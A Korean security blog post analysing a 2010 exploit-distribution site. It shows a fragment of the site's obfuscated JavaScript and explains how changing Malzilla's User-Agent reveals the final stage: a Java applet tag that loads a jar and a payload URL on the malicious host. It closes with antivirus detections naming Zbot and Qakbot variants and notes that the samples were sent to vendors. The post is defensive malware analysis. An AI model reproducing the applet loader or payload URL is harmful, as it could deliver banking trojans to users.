본문 바로가기

security/악성코드 유포

www.rendom.mx/bst/ 익스플로릿 최종 파일!

우연히 구글링을 하던중 www.rendom.mx/bst/ 를 발견하였다.
이사이트는 익스플로릿을 배포하는것으로 알려져있다.
멀질라로 통해 처음에 봤을때는 코드형태가 매우 이상했다.

 var wR39n2OWQBsOq7 ='';

wR39n2OWQBsOq7 = 'so un ds25so un ds30so un ds41so un ds76so un ds61so u\
n ds72so un ds25so un ds32so un ds30so un ds59so un ds\

이런식으로 계속 반복이 되는 코드를 보았다.
난 바로 도움을 청했다. 이런것을 볼때는 어떻게 보아야하는지 물어보았다. 첨에는 멀질라로의 한계같았지만 약간의 설정만 변경하면 최종파일까지 보일수 있다는걸 알았다.

처음 멀질라 설정값은
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)

이런식으로 되어있다 하지만 이렇게 본다면 나와같이 이게 뭐니 하고 의문을 가질것이다. 하지만 User Agent 를 통하여 설정을
Mozilla/7.0 (Windows; U; Windows NT 5.1; en-US; rv:0.9.2)  Gecko/20010726 Netscape/7.0

이쪽으로 설정을 변경한다면

 <applet code="sklif.Hieeyfc.class" archive="j1_893d.jar" width="480" height="200">
 <param name="data" VALUE="
http://www.rendom.mx/bst/load.php?spl=javal">
 <param name="cc" value="1">
 </applet>

이런식으로 최종파일을 쉽게 찾을수 있다. 결론적으로 멀질라의 간단한 특성을 이해하고 있다면 쉽게 찾을수 있다는 것이었다.
이걸 찾기까지 많은 시간을 내주신 바이쭌님과 처리님께 마지막으로 감사를 드립니다!ㅎ

검사 파일: load.php 전송 시각: 2010.05.11 04:24:06 (UTC)

 a-squared 4.5.0.50
2010.05.10 Packed.Win32.Krap!IK

AhnLab-V3 2010.05.11.00
2010.05.10 Packed/Win32.Krap

AntiVir 8.2.1.236
2010.05.10 TR/Crypt.XPACK.Gen

 Antiy-AVL 2.0.3.7
2010.05.10 Packed/Win32.Krap.gen

Avast 4.8.1351.0
2010.05.10 Win32:Trojan-gen

Avast5 5.0.332.0
2010.05.10 Win32:Trojan-gen

AVG 9.0.0.787
2010.05.11 Generic17.BUNU

BitDefender   7.2
2010.05.11 Backdoor.Bot.121242

Comodo 4821
2010.05.11 TrojWare.Win32.Trojan.Agent.Gen

F-Secure 9.0.15370.0
2010.05.11 Backdoor.Bot.121242

GData 21
2010.05.11 Backdoor.Bot.121242

Ikarus T3.1.1.84.0
2010.05.11 Packed.Win32.Krap

Kaspersky 7.0.0.125
2010.05.11 Packed.Win32.Krap.gx

McAfee-GW-Edition
2010.1 2010.05.10 Artemis!7B7D3BC35365

Microsoft 1.5703
2010.05.11 PWS:Win32/Zbot.gen!Y

NOD32 5103
2010.05.10 a variant of Win32/Kryptik.EBW

nProtect 2010-05-10.01
2010.05.10 Backdoor.Bot.121242

Panda 10.0.2.7
2010.05.10 Suspicious file

Sophos 4.53.0
2010.05.11 Mal/Zbot-U

Sunbelt 6289
2010.05.11 Trojan.Win32.Generic!BT

TrendMicro 9.120.0.1004
2010.05.11 TSPY_QAKBOT.SMG

TrendMicro-HouseCall 9.120.0.1004
2010.05.11 TSPY_QAKBOT.SMG

 마지막으로 모든 샘플은 안철수연구소 , 이스트소프트

전송합니다!